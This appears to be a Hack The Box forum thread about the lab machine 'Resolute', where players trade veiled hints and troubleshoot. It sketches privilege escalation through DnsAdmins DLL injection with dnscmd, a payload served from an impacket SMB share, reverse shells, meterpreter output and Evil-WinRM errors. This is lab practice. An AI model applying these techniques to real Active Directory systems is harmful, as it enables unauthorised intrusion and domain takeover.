Resolute

Possible Spoiler Removed
Is it supposed to be that way ? It should not be I guess

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

@ev1lm0rty said:

Is it supposed to be that way ? It should not be I guess

Chances are someone else left it in an unstable state when they rooted it. You can test this by resetting the box and trying it again (the password wont have changed).

Alternatively, you have a valid short cut to root.

Well I’ll try that. Requested a reset.

Type your comment> @TazWake said:

@g1anma5 said:

Is normal that smb doesn’t respond? seems to be down.

SMB being down isn’t normal.

After a reset, it seems to work properly.

Finally ROOT! fun and instructive windows machine. User was easy. Root was hard to me, wastes a lot of time. Try hard!

My hints:
USER1: just enumerate all you can see…
USER2: …and you CAN’T see.

ROOT: If you think that you are in correct way, rembember to restart the right service.

PM me if needs more hints!

Rooted after 1.5 days of work.

Users are pretty straightforward and people in this forum have already mentioned everything you need.

Initial foothold - enumerate (a classic tool and comes installed with kali). Use the value obtained and try it everywhere you can possibly find.

User - Once you find the right credentials, this should be pretty straightforward.

Root - You should have the credentials to 2 users by now, but you need to gain access to another user. To find it, imagine yourself as a user that tries to HIDE information from other users. That user can do some stuff related to d**, from here google your way to privesc. Just to note, off the shelf payload is fine but architecture is important!

Hope this doesn’t give away too much. If you need a nudge, feel free to PM me.

I’m struggling with priv escalation part
Tried dn**Adm dll injection several times
I don’t figure out the catch for the momemt
!!! Any suggestions please??

Type your comment> @djnux said:

I’m struggling with priv escalation part
Tried dn**Adm dll injection several times
I don’t figure out the catch for the momemt
!!! Any suggestions please??

Architecture of the target machine is important, make sure you are restarting the right service. Sometimes other people are on the machine doing the same things too.

The arch is x64 and then scxxx things

login with 1st user, now stuck with 2nd user r*** any tips??

Type your comment> @DeeKay911 said:

login with 1st user, now stuck with 2nd user r*** any tips??

You want to start looking around. Looking for things that you might not see if you aren’t looking for everything.

got the second user r***, and know that he is in dn gp.
I also made the payload with the poison, shared it via s
* to the host, done the “dn****d …” command part and after that the restart, but got no reverse shell. also tried x86 and x64 architecture and different encoding types with poison.
help would be very appreciated!

Type your comment> @grab0id said:

Type your comment> @DeeKay911 said:

login with 1st user, now stuck with 2nd user r*** any tips??

You want to start looking around. Looking for things that you might not see if you aren’t looking for everything.

Thanks @grab0id, found the way for r***

Type your comment> @Cooper24 said:

got the second user r***, and know that he is in dn gp.
I also made the payload with the poison, shared it via s
* to the host, done the “dn****d …” command part and after that the restart, but got no reverse shell. also tried x86 and x64 architecture and different encoding types with poison.
help would be very appreciated!

i am facing same issue, have you got any solution ?

just got the Admin. first AD box, lots of learning…

Wow! This box was hard for me am not great on Windows but learned a lot through this!

user 1: You need to take your outside enumeration tools to the next generation!
user 2: When enumeration making sure you’re listing ALL files
root: Pay attention to the output of whoami /all and then do some research. On this step I had no problem with AV even without adding anything fancy to my output.

Protip:

Your exploit will not be loaded from s*b until you restart the service. That caused me an hour of headache :slight_smile:

Type your comment> @steby33 said:

hello, i obtain user access but i have a problem for root access:
the victim (resolute) don’t come to me to pickup the payload on my SMB server, could you help me (no connexion to my SMB server, but it listen well:

impacket-smbserver -debug share /tmp
[] Config file parsed
[
] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[
] Config file parsed
[] Config file parsed
[
] Config file parsed

and i execute the dnscmd command on ther server with the good options normally…

Any luck, I am stuck here as well. :confused:

Type your comment> @MrSHolmes said:

Type your comment> @steby33 said:

hello, i obtain user access but i have a problem for root access:
the victim (resolute) don’t come to me to pickup the payload on my SMB server, could you help me (no connexion to my SMB server, but it listen well:

impacket-smbserver -debug share /tmp
[] Config file parsed
[
] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[
] Config file parsed
[] Config file parsed
[
] Config file parsed

and i execute the dnscmd command on ther server with the good options normally…

Any luck, I am stuck here as well. :confused:

I had the same issue, add the parameter “-smb2support” when you create the share, e.g.:
smbserver.py -smb2support -debug SHARE /path/to/share/

Loved this box, Resolute!
Definitely loved it, even because it has been my first box on HTB!
It took a lot of time! :smiley:

I learned so much on Win Env, I was not used to it anymore, rooted first the “unintended way”, then the intended one using a writeup :wink:

It’s so sad knowing it will be retired during this coming weekend…

Bye, Resolute! So long, and thanks for all the fish… (quote)

Can anyone PM. why i get this error , or how to fix

I get this when trying to connect

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated

/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated

Error: An error of type HTTPClient::ReceiveTimeoutError happened, message is execution expired

Error: Exiting with code 1